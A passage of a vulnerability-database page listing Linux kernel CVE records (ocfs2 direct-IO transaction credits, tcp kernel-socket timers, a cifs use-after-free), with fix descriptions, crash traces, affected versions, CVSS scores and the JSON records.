ffffffff8c1d69b9 #3 ocfs2_handle_error at ffffffffc0c86c0c [ocfs2] #4 __ocfs2_abort at ffffffffc0c88387 [ocfs2] #5 ocfs2_journal_dirty at ffffffffc0c51e98 [ocfs2] #6 ocfs2_split_extent at ffffffffc0c27ea3 [ocfs2] #7 ocfs2_change_extent_flag at ffffffffc0c28053 [ocfs2] #8 ocfs2_mark_extent_written at ffffffffc0c28347 [ocfs2] #9 ocfs2_dio_end_io_write at ffffffffc0c2bef9 [ocfs2] #10 ocfs2_dio_end_io at ffffffffc0c2c0f5 [ocfs2] #11 dio_complete at ffffffff8c2b9fa7 #12 do_blockdev_direct_IO at ffffffff8c2bc09f #13 ocfs2_direct_IO at ffffffffc0c2b653 [ocfs2] #14 generic_file_direct_write at ffffffff8c1dcf14 #15 __generic_file_write_iter at ffffffff8c1dd07b #16 ocfs2_file_write_iter at ffffffffc0c49f1f [ocfs2] #17 aio_write at ffffffff8c2cc72e #18 kmem_cache_alloc at ffffffff8c248dde #19 do_io_submit at ffffffff8c2ccada #20 do_syscall_64 at ffffffff8c004984 #21 entry_SYSCALL_64_after_hwframe at ffffffff8c8000ba

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/a68b896aa56e43550…
	https://git.kernel.org/stable/c/320273b5649bbcee8…
	https://git.kernel.org/stable/c/9ea2d1c6789722d58…
	https://git.kernel.org/stable/c/c05ffb693bfb42a48…
	https://git.kernel.org/stable/c/331d1079d58206ff7…
	https://git.kernel.org/stable/c/be346c1a6eeb49d8f…

Impacted products

Vendor

Product

Version

Linux

Affected: c15471f79506830f80eca0e7fe09b8213953ab5f , < a68b896aa56e435506453ec8835bc991ec3ae687 (git)
Affected: c15471f79506830f80eca0e7fe09b8213953ab5f , < 320273b5649bbcee87f9e65343077189699d2a7a (git)
Affected: c15471f79506830f80eca0e7fe09b8213953ab5f , < 9ea2d1c6789722d58ec191f14f9a02518d55b6b4 (git)
Affected: c15471f79506830f80eca0e7fe09b8213953ab5f , < c05ffb693bfb42a48ef3ee88a55b57392984e111 (git)
Affected: c15471f79506830f80eca0e7fe09b8213953ab5f , < 331d1079d58206ff7dc5518185f800b412f89bc6 (git)
Affected: c15471f79506830f80eca0e7fe09b8213953ab5f , < be346c1a6eeb49d8fda827d2a9522124c2f72f36 (git)

Linux

Affected: 4.6
Unaffected: 0 , < 4.6 (semver)
Unaffected: 5.10.221 , ≤ 5.10.* (semver)
Unaffected: 5.15.162 , ≤ 5.15.* (semver)
Unaffected: 6.1.97 , ≤ 6.1.* (semver)
Unaffected: 6.6.37 , ≤ 6.6.* (semver)
Unaffected: 6.9.8 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:01:11.373Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a68b896aa56e435506453ec8835bc991ec3ae687"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/320273b5649bbcee87f9e65343077189699d2a7a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9ea2d1c6789722d58ec191f14f9a02518d55b6b4"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c05ffb693bfb42a48ef3ee88a55b57392984e111"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/331d1079d58206ff7dc5518185f800b412f89bc6"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/be346c1a6eeb49d8fda827d2a9522124c2f72f36"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42077",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:19:23.681677Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:57.349Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/ocfs2/aops.c",
            "fs/ocfs2/journal.c",
            "fs/ocfs2/journal.h",
            "fs/ocfs2/ocfs2_trace.h"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "a68b896aa56e435506453ec8835bc991ec3ae687",
              "status": "affected",
              "version": "c15471f79506830f80eca0e7fe09b8213953ab5f",
              "versionType": "git"
            },
            {
              "lessThan": "320273b5649bbcee87f9e65343077189699d2a7a",
              "status": "affected",
              "version": "c15471f79506830f80eca0e7fe09b8213953ab5f",
              "versionType": "git"
            },
            {
              "lessThan": "9ea2d1c6789722d58ec191f14f9a02518d55b6b4",
              "status": "affected",
              "version": "c15471f79506830f80eca0e7fe09b8213953ab5f",
              "versionType": "git"
            },
            {
              "lessThan": "c05ffb693bfb42a48ef3ee88a55b57392984e111",
              "status": "affected",
              "version": "c15471f79506830f80eca0e7fe09b8213953ab5f",
              "versionType": "git"
            },
            {
              "lessThan": "331d1079d58206ff7dc5518185f800b412f89bc6",
              "status": "affected",
              "version": "c15471f79506830f80eca0e7fe09b8213953ab5f",
              "versionType": "git"
            },
            {
              "lessThan": "be346c1a6eeb49d8fda827d2a9522124c2f72f36",
              "status": "affected",
              "version": "c15471f79506830f80eca0e7fe09b8213953ab5f",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/ocfs2/aops.c",
            "fs/ocfs2/journal.c",
            "fs/ocfs2/journal.h",
            "fs/ocfs2/ocfs2_trace.h"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.6"
            },
            {
              "lessThan": "4.6",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.221",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.162",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.97",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.37",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.8",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.221",
                  "versionStartIncluding": "4.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.162",
                  "versionStartIncluding": "4.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.97",
                  "versionStartIncluding": "4.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.37",
                  "versionStartIncluding": "4.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.8",
                  "versionStartIncluding": "4.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "4.6",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nocfs2: fix DIO failure due to insufficient transaction credits\n\nThe code in ocfs2_dio_end_io_write() estimates number of necessary\ntransaction credits using ocfs2_calc_extend_credits().  This however does\nnot take into account that the IO could be arbitrarily large and can\ncontain arbitrary number of extents.\n\nExtent tree manipulations do often extend the current transaction but not\nin all of the cases.  For example if we have only single block extents in\nthe tree, ocfs2_mark_extent_written() will end up calling\nocfs2_replace_extent_rec() all the time and we will never extend the\ncurrent transaction and eventually exhaust all the transaction credits if\nthe IO contains many single block extents.  Once that happens a\nWARN_ON(jbd2_handle_buffer_credits(handle) \u003c= 0) is triggered in\njbd2_journal_dirty_metadata() and subsequently OCFS2 aborts in response to\nthis error.  This was actually triggered by one of our customers on a\nheavily fragmented OCFS2 filesystem.\n\nTo fix the issue make sure the transaction always has enough credits for\none extent insert before each call of ocfs2_mark_extent_written().\n\nHeming Zhao said:\n\n------\nPANIC: \"Kernel panic - not syncing: OCFS2: (device dm-1): panic forced after error\"\n\nPID: xxx  TASK: xxxx  CPU: 5  COMMAND: \"SubmitThread-CA\"\n  #0 machine_kexec at ffffffff8c069932\n  #1 __crash_kexec at ffffffff8c1338fa\n  #2 panic at ffffffff8c1d69b9\n  #3 ocfs2_handle_error at ffffffffc0c86c0c [ocfs2]\n  #4 __ocfs2_abort at ffffffffc0c88387 [ocfs2]\n  #5 ocfs2_journal_dirty at ffffffffc0c51e98 [ocfs2]\n  #6 ocfs2_split_extent at ffffffffc0c27ea3 [ocfs2]\n  #7 ocfs2_change_extent_flag at ffffffffc0c28053 [ocfs2]\n  #8 ocfs2_mark_extent_written at ffffffffc0c28347 [ocfs2]\n  #9 ocfs2_dio_end_io_write at ffffffffc0c2bef9 [ocfs2]\n#10 ocfs2_dio_end_io at ffffffffc0c2c0f5 [ocfs2]\n#11 dio_complete at ffffffff8c2b9fa7\n#12 do_blockdev_direct_IO at ffffffff8c2bc09f\n#13 ocfs2_direct_IO at ffffffffc0c2b653 [ocfs2]\n#14 generic_file_direct_write at ffffffff8c1dcf14\n#15 __generic_file_write_iter at ffffffff8c1dd07b\n#16 ocfs2_file_write_iter at ffffffffc0c49f1f [ocfs2]\n#17 aio_write at ffffffff8c2cc72e\n#18 kmem_cache_alloc at ffffffff8c248dde\n#19 do_io_submit at ffffffff8c2ccada\n#20 do_syscall_64 at ffffffff8c004984\n#21 entry_SYSCALL_64_after_hwframe at ffffffff8c8000ba"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:22:28.417Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/a68b896aa56e435506453ec8835bc991ec3ae687"
        },
        {
          "url": "https://git.kernel.org/stable/c/320273b5649bbcee87f9e65343077189699d2a7a"
        },
        {
          "url": "https://git.kernel.org/stable/c/9ea2d1c6789722d58ec191f14f9a02518d55b6b4"
        },
        {
          "url": "https://git.kernel.org/stable/c/c05ffb693bfb42a48ef3ee88a55b57392984e111"
        },
        {
          "url": "https://git.kernel.org/stable/c/331d1079d58206ff7dc5518185f800b412f89bc6"
        },
        {
          "url": "https://git.kernel.org/stable/c/be346c1a6eeb49d8fda827d2a9522124c2f72f36"
        }
      ],
      "title": "ocfs2: fix DIO failure due to insufficient transaction credits",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42077",
    "datePublished": "2024-07-29T15:52:39.661Z",
    "dateReserved": "2024-07-29T15:50:41.169Z",
    "dateUpdated": "2025-11-03T22:01:11.373Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-35910 (GCVE-0-2024-35910)

Vulnerability from cvelistv5 – Published: 2024-05-19 08:35 – Updated: 2025-05-04 09:08

Title

tcp: properly terminate timers for kernel sockets

Summary

In the Linux kernel, the following vulnerability has been resolved: tcp: properly terminate timers for kernel sockets We had various syzbot reports about tcp timers firing after the corresponding netns has been dismantled. Fortunately Josef Bacik could trigger the issue more often, and could test a patch I wrote two years ago. When TCP sockets are closed, we call inet_csk_clear_xmit_timers() to 'stop' the timers. inet_csk_clear_xmit_timers() can be called from any context, including when socket lock is held. This is the reason it uses sk_stop_timer(), aka del_timer(). This means that ongoing timers might finish much later. For user sockets, this is fine because each running timer holds a reference on the socket, and the user socket holds a reference on the netns. For kernel sockets, we risk that the netns is freed before timer can complete, because kernel sockets do not hold reference on the netns. This patch adds inet_csk_clear_xmit_timers_sync() function that using sk_stop_timer_sync() to make sure all timers are terminated before the kernel socket is released. Modules using kernel sockets close them in their netns exit() handler. Also add sock_not_owned_by_me() helper to get LOCKDEP support : inet_csk_clear_xmit_timers_sync() must not be called while socket lock is held. It is very possible we can revert in the future commit 3a58f13a881e ("net: rds: acquire refcount on TCP sockets") which attempted to solve the issue in rds only. (net/smc/af_smc.c and net/mptcp/subflow.c have similar code) We probably can remove the check_net() tests from tcp_out_of_resources() and __tcp_close() in the future.

Severity ?

5.8 (Medium)


                        
                          CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H

CWE

CWE-noinfo Not enough information

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/93f0133b9d589cc6e…
	https://git.kernel.org/stable/c/44e62f5d356786867…
	https://git.kernel.org/stable/c/e3e27d2b446deb1f6…
	https://git.kernel.org/stable/c/2e43d8eba6edd1cf0…
	https://git.kernel.org/stable/c/91b243de910a9ac84…
	https://git.kernel.org/stable/c/c1ae4d1e76eacddaa…
	https://git.kernel.org/stable/c/899265c1389fe0228…
	https://git.kernel.org/stable/c/151c9c724d05d5b0d…

Impacted products

Vendor

Product

Version

Linux

Affected: 26abe14379f8e2fa3fd1bcf97c9a7ad9364886fe , < 93f0133b9d589cc6e865f254ad9be3e9d8133f50 (git)
Affected: 26abe14379f8e2fa3fd1bcf97c9a7ad9364886fe , < 44e62f5d35678686734afd47c6a421ad30772e7f (git)
Affected: 26abe14379f8e2fa3fd1bcf97c9a7ad9364886fe , < e3e27d2b446deb1f643758a0c4731f5c22492810 (git)
Affected: 26abe14379f8e2fa3fd1bcf97c9a7ad9364886fe , < 2e43d8eba6edd1cf05a3a20fdd77688fa7ec16a4 (git)
Affected: 26abe14379f8e2fa3fd1bcf97c9a7ad9364886fe , < 91b243de910a9ac8476d40238ab3dbfeedd5b7de (git)
Affected: 26abe14379f8e2fa3fd1bcf97c9a7ad9364886fe , < c1ae4d1e76eacddaacb958b67cd942082f800c87 (git)
Affected: 26abe14379f8e2fa3fd1bcf97c9a7ad9364886fe , < 899265c1389fe022802aae73dbf13ee08837a35a (git)
Affected: 26abe14379f8e2fa3fd1bcf97c9a7ad9364886fe , < 151c9c724d05d5b0dd8acd3e11cb69ef1f2dbada (git)

Linux

Affected: 4.2
Unaffected: 0 , < 4.2 (semver)
Unaffected: 4.19.312 , ≤ 4.19.* (semver)
Unaffected: 5.4.274 , ≤ 5.4.* (semver)
Unaffected: 5.10.215 , ≤ 5.10.* (semver)
Unaffected: 5.15.154 , ≤ 5.15.* (semver)
Unaffected: 6.1.85 , ≤ 6.1.* (semver)
Unaffected: 6.6.26 , ≤ 6.6.* (semver)
Unaffected: 6.8.5 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "HIGH",
              "attackVector": "LOCAL",
              "availabilityImpact": "HIGH",
              "baseScore": 5.8,
              "baseSeverity": "MEDIUM",
              "confidentialityImpact": "LOW",
              "integrityImpact": "LOW",
              "privilegesRequired": "LOW",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-35910",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-29T18:25:39.390284Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "description": "CWE-noinfo Not enough information",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-10-29T19:44:27.885Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:48.925Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/93f0133b9d589cc6e865f254ad9be3e9d8133f50"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/44e62f5d35678686734afd47c6a421ad30772e7f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e3e27d2b446deb1f643758a0c4731f5c22492810"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2e43d8eba6edd1cf05a3a20fdd77688fa7ec16a4"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/91b243de910a9ac8476d40238ab3dbfeedd5b7de"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c1ae4d1e76eacddaacb958b67cd942082f800c87"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/899265c1389fe022802aae73dbf13ee08837a35a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/151c9c724d05d5b0dd8acd3e11cb69ef1f2dbada"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "include/net/inet_connection_sock.h",
            "include/net/sock.h",
            "net/ipv4/inet_connection_sock.c",
            "net/ipv4/tcp.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "93f0133b9d589cc6e865f254ad9be3e9d8133f50",
              "status": "affected",
              "version": "26abe14379f8e2fa3fd1bcf97c9a7ad9364886fe",
              "versionType": "git"
            },
            {
              "lessThan": "44e62f5d35678686734afd47c6a421ad30772e7f",
              "status": "affected",
              "version": "26abe14379f8e2fa3fd1bcf97c9a7ad9364886fe",
              "versionType": "git"
            },
            {
              "lessThan": "e3e27d2b446deb1f643758a0c4731f5c22492810",
              "status": "affected",
              "version": "26abe14379f8e2fa3fd1bcf97c9a7ad9364886fe",
              "versionType": "git"
            },
            {
              "lessThan": "2e43d8eba6edd1cf05a3a20fdd77688fa7ec16a4",
              "status": "affected",
              "version": "26abe14379f8e2fa3fd1bcf97c9a7ad9364886fe",
              "versionType": "git"
            },
            {
              "lessThan": "91b243de910a9ac8476d40238ab3dbfeedd5b7de",
              "status": "affected",
              "version": "26abe14379f8e2fa3fd1bcf97c9a7ad9364886fe",
              "versionType": "git"
            },
            {
              "lessThan": "c1ae4d1e76eacddaacb958b67cd942082f800c87",
              "status": "affected",
              "version": "26abe14379f8e2fa3fd1bcf97c9a7ad9364886fe",
              "versionType": "git"
            },
            {
              "lessThan": "899265c1389fe022802aae73dbf13ee08837a35a",
              "status": "affected",
              "version": "26abe14379f8e2fa3fd1bcf97c9a7ad9364886fe",
              "versionType": "git"
            },
            {
              "lessThan": "151c9c724d05d5b0dd8acd3e11cb69ef1f2dbada",
              "status": "affected",
              "version": "26abe14379f8e2fa3fd1bcf97c9a7ad9364886fe",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "include/net/inet_connection_sock.h",
            "include/net/sock.h",
            "net/ipv4/inet_connection_sock.c",
            "net/ipv4/tcp.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.2"
            },
            {
              "lessThan": "4.2",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.312",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.274",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.215",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.154",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.85",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.26",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.5",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.312",
                  "versionStartIncluding": "4.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.274",
                  "versionStartIncluding": "4.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.215",
                  "versionStartIncluding": "4.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.154",
                  "versionStartIncluding": "4.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.85",
                  "versionStartIncluding": "4.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.26",
                  "versionStartIncluding": "4.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.5",
                  "versionStartIncluding": "4.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "4.2",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntcp: properly terminate timers for kernel sockets\n\nWe had various syzbot reports about tcp timers firing after\nthe corresponding netns has been dismantled.\n\nFortunately Josef Bacik could trigger the issue more often,\nand could test a patch I wrote two years ago.\n\nWhen TCP sockets are closed, we call inet_csk_clear_xmit_timers()\nto \u0027stop\u0027 the timers.\n\ninet_csk_clear_xmit_timers() can be called from any context,\nincluding when socket lock is held.\nThis is the reason it uses sk_stop_timer(), aka del_timer().\nThis means that ongoing timers might finish much later.\n\nFor user sockets, this is fine because each running timer\nholds a reference on the socket, and the user socket holds\na reference on the netns.\n\nFor kernel sockets, we risk that the netns is freed before\ntimer can complete, because kernel sockets do not hold\nreference on the netns.\n\nThis patch adds inet_csk_clear_xmit_timers_sync() function\nthat using sk_stop_timer_sync() to make sure all timers\nare terminated before the kernel socket is released.\nModules using kernel sockets close them in their netns exit()\nhandler.\n\nAlso add sock_not_owned_by_me() helper to get LOCKDEP\nsupport : inet_csk_clear_xmit_timers_sync() must not be called\nwhile socket lock is held.\n\nIt is very possible we can revert in the future commit\n3a58f13a881e (\"net: rds: acquire refcount on TCP sockets\")\nwhich attempted to solve the issue in rds only.\n(net/smc/af_smc.c and net/mptcp/subflow.c have similar code)\n\nWe probably can remove the check_net() tests from\ntcp_out_of_resources() and __tcp_close() in the future."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:08:11.069Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/93f0133b9d589cc6e865f254ad9be3e9d8133f50"
        },
        {
          "url": "https://git.kernel.org/stable/c/44e62f5d35678686734afd47c6a421ad30772e7f"
        },
        {
          "url": "https://git.kernel.org/stable/c/e3e27d2b446deb1f643758a0c4731f5c22492810"
        },
        {
          "url": "https://git.kernel.org/stable/c/2e43d8eba6edd1cf05a3a20fdd77688fa7ec16a4"
        },
        {
          "url": "https://git.kernel.org/stable/c/91b243de910a9ac8476d40238ab3dbfeedd5b7de"
        },
        {
          "url": "https://git.kernel.org/stable/c/c1ae4d1e76eacddaacb958b67cd942082f800c87"
        },
        {
          "url": "https://git.kernel.org/stable/c/899265c1389fe022802aae73dbf13ee08837a35a"
        },
        {
          "url": "https://git.kernel.org/stable/c/151c9c724d05d5b0dd8acd3e11cb69ef1f2dbada"
        }
      ],
      "title": "tcp: properly terminate timers for kernel sockets",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35910",
    "datePublished": "2024-05-19T08:35:03.287Z",
    "dateReserved": "2024-05-17T13:50:33.121Z",
    "dateUpdated": "2025-05-04T09:08:11.069Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2023-52752 (GCVE-0-2023-52752)

Vulnerability from cvelistv5 – Published: 2024-05-21 15:30 – Updated: 2026-01-05 10:17

Title

smb: client: fix use-after-free bug in cifs_debug_data_proc_show()

Summary

In the Linux kernel, the following vulnerability has been resolved: smb: client: fix use-after-free bug in cifs_debug_data_proc_show() Skip SMB sessions that are being teared down (e.g. @ses->ses_status == SES_EXITING) in cifs_debug_data_proc_show() to avoid use-after-free in @ses. This fixes the following GPF when reading from /proc/fs/cifs/DebugData while mounting and umounting [ 816.251274] general protection fault, probably for non-canonical address 0x6b6b6b6b6b6b6d81: 0000 [#1] PREEMPT SMP NOPTI ... [ 816.260138] Call Trace: [ 816.260329] <TASK> [ 816.260499] ? die_addr+0x36/0x90 [ 816.260762] ? exc_general_protection+0x1b3/0x410 [ 816.261126] ? asm_exc_general_protection+0x26/0x30 [ 816.261502] ? cifs_debug_tcon+0xbd/0x240 [cifs] [ 816.261878] ? cifs_debug_tcon+0xab/0x240 [cifs] [ 816.262249] cifs_debug_data_proc_show+0x516/0xdb0 [cifs] [ 816.262689] ? seq_read_iter+0x379/0x470 [ 816.262995] seq_read_iter+0x118/0x470 [ 816.263291] proc_reg_read_iter+0x53/0x90 [ 816.263596] ? srso_alias_return_thunk+0x5/0x7f [ 816.263945] vfs_read+0x201/0x350 [ 816.264211] ksys_read+0x75/0x100 [ 816.264472] do_syscall_64+0x3f/0x90 [ 816.264750] entry_SYSCALL_64_after_hwframe+0x6e/0xd8 [ 816.265135] RIP: 0033:0x7fd5e669d381

Severity ?

7.8 (High)


                        
                          CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-416 - Use After Free

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/2abdf136784b7edae…
	https://git.kernel.org/stable/c/336a066990bb3962c…
	https://git.kernel.org/stable/c/558817597d5fbd7af…
	https://git.kernel.org/stable/c/89929ea46f9cc11ba…
	https://git.kernel.org/stable/c/0ab6f842452ce2cae…
	https://git.kernel.org/stable/c/d328c09ee9f15ee5a…

Impacted products

Vendor

Product

Version

Linux

Affected: 7f48558e6489d032b1584b0cc9ac4bb11072c034 , < 2abdf136784b7edaec7ffe0f4b461b63f9c4c4de (git)
